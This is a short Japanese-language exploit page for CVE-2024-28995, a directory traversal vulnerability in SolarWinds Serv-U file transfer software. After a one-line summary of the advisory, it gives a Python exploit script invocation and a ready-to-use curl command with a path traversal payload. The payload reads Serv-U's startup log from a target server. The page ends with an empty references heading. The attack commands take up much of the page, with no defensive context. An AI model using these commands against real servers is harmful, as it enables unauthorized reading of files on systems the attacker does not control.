
CVE-2024-28995 のエクスプロイト
2024年6月5日、SolarWindsは、ファイル転送ソリューションServ-Uに影響する高深刻度のディレクトリトラバーサル脆弱性であるCVE-2024-28995に関するアドバイザリを公開しました。この脆弱性は、Web Immunifyの研究者Hussein Daherによって発見されました。
python3 CVE-2024-28995.py -t http://example.com/ -f somefile
curl -i -k --path-as-is "http://<target>/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt"
参照: